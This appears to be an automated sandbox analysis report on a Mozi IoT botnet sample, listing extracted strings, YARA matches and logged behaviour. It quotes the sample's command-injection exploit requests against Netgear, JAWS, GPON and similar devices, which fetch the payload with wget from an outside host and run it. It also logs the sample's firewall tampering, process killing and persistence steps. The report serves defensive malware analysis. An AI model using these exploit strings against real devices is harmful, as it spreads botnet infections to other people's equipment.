Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: rIbyGX66Op, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4616) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4650) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4653) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4716) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4736) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4748) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4796) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4805) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4829) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4878) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4906) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4926) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4931) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4947) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4974) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5000) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5025) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5034) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5057) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5087) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5117) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5120) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5127) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5152) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5182) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5210) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5231) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5234) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/rIbyGX66Op (PID: 4578) File: /proc/4578/mounts Jump to behavior
Sample tries to persist itself using /etc/profile
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/bash_completion.sh Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Sample tries to persist itself using System V runlevels
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/rcS.d/S95baby.sh Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/rc.local Jump to behavior
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4582) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 4582) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3512/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/359/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1452/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3632/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3518/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1339/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/19/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/483/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3527/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3527/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3525/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1346/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3524/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3524/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3523/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/5/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/7/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/8/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1363/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3541/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3541/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1362/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/496/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/496/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/31/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/31/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1119/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3790/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3791/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3310/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3431/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3431/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3550/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/260/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/263/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/264/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/385/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/144/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/386/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/145/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/146/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3546/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3546/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/147/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3303/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3545/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/148/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/149/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3543/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/822/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/822/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3308/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3308/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3429/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3429/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/47/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/48/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/48/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/49/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/150/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/271/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/151/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/152/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/153/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/395/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/396/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/154/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/155/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/156/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/1017/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/157/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/158/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/159/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3432/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/3432/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/50/stat Jump to behavior
Source: /usr/bin/killall (PID: 4582) File opened: /proc/51/stat Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/rIbyGX66Op (PID: 4580) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4614) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4648) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4651) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4682) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4708) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4732) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4737) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4741) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4791) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4794) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4799) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4821) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4845) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4857) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4868) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4897) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4921) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4928) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4937) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4966) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4991) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5017) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5023) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5028) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5049) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5077) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5115) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5118) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5122) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5142) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5173) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5200) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5228) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT" Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 5232) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT" Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4616) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4650) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4653) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4690) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4716) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4736) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4748) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4796) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4805) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4829) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4878) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4906) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4926) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4931) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4947) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4974) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5000) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5021) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5025) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5034) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5057) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5087) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5117) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5120) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5127) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5152) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5182) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT Jump to behavior
